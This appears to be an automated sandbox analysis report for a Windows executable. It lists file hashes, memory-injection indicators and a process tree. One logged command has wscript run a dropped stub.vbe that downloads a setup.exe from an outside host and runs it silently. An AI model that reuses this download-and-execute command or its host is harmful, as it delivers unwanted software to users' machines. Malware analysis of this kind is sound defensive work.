fd4823604bc2633fc2c89c3b25aec23eb81303118fe9605be4ee3b89107d0789

Analysis

max time kernel
153s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
15/03/2024, 15:06

Target

cbb8f341256f07d59a449c7bc0b28211.exe
Size

92KB
MD5

cbb8f341256f07d59a449c7bc0b28211
SHA1

e5012e367d6f4aa1f966b801dc1cfaba3554699c
SHA256

fd4823604bc2633fc2c89c3b25aec23eb81303118fe9605be4ee3b89107d0789
SHA512

f98130e718a445df1e7706bff8b0c898501a65c45c7f038fec1359c9a08ba91e78a131778d71e6a506ef9629ccedafd6bd2b7c77389e83daa2c2c303e75ed0a1
SSDEEP

1536:+o7kk+E2w2h9RGLf+09CsSK7QJqfMrIt3dakSlJ7vvvvdQv+2q4f2:9hwwkD3veX6lJGqs2

Score

1^/10

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 4060 wrote to memory of 5112	4060	cbb8f341256f07d59a449c7bc0b28211.exe	98
PID 4060 wrote to memory of 5112	4060	cbb8f341256f07d59a449c7bc0b28211.exe	98
PID 4060 wrote to memory of 5112	4060	cbb8f341256f07d59a449c7bc0b28211.exe	98
PID 5112 wrote to memory of 4792	5112	cbb8f341256f07d59a449c7bc0b28211.exe	99
PID 5112 wrote to memory of 4792	5112	cbb8f341256f07d59a449c7bc0b28211.exe	99
PID 5112 wrote to memory of 4792	5112	cbb8f341256f07d59a449c7bc0b28211.exe	99
PID 4792 wrote to memory of 4948	4792	cbb8f341256f07d59a449c7bc0b28211.exe	100
PID 4792 wrote to memory of 4948	4792	cbb8f341256f07d59a449c7bc0b28211.exe	100
PID 4792 wrote to memory of 4948	4792	cbb8f341256f07d59a449c7bc0b28211.exe	100

C:\Users\Admin\AppData\Local\Temp\cbb8f341256f07d59a449c7bc0b28211.exe
"C:\Users\Admin\AppData\Local\Temp\cbb8f341256f07d59a449c7bc0b28211.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4060
- C:\Users\Admin\AppData\Local\Temp\cbb8f341256f07d59a449c7bc0b28211.exe
  C:\Users\Admin\AppData\Local\Temp\cbb8f341256f07d59a449c7bc0b28211.exe 224541958355
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5112
- - C:\Users\Admin\AppData\Local\Temp\cbb8f341256f07d59a449c7bc0b28211.exe
    C:\Users\Admin\AppData\Local\Temp\cbb8f341256f07d59a449c7bc0b28211.exe -bkg 224541958355
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4792
  - - C:\Windows\SysWOW64\wscript.exe
      wscript /B "C:\Users\Admin\AppData\Local\Temp\stb170E.tmp\stub.vbe" "http://upgrade.beatboxtriangle.com/install.aspx?b=basicscan" "C:\Users\Admin\AppData\Local\Temp\stb170D.tmp\setup.exe" ""C:\Users\Admin\AppData\Local\Temp\stb170D.tmp\setup.exe" -i edf237f33c4740c980d9611ef64062d3 -p BscscnPB /S" "http://upgrade.beatboxtriangle.com/?vn=0&ny81=623&rea=9999&whi80=8101&cid=edf237f33c4740c980d9611ef64062d3&herp8=58&b=basicscan&dxx87=65&ptag=BscscnPB&awd0=000&av=Ao19cDF0lroKQZGcGWv64KQowTOUJpXf8zxYqCi0&nkcd10=4701&product=0&cgo2=676&as=Ao19cDF0lroKQZGcGWv64KQowTOUJpXf8zxYqCi0" 0 1
      4⤵
      PID:4948

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1340 --field-trial-handle=2276,i,11674642242468042059,14711253743544118298,262144 --variations-seed-version /prefetch:8
1⤵
PID:4436

C:\Users\Admin\AppData\Local\Temp\stb170E.tmp\stub.vbe

Filesize
5KB

MD5
babda98240e8ff7927acfe95e7447f3d

SHA1
9ef98b18119b388638aedf3e50e59c07b121c99b

SHA256
7697b0aac6263241cb6b27e824644bda1e9fe95bab761626ac1c7c7454fbbbac

SHA512
ab62f6d65c7f9ca591590534bcbb8930dbedb48294eef6c832581b5ba754a14a53a3013cac728902d6bb83dd6a5db2d29444a5cf1df093de6ed600c70b7bf484

Download Submit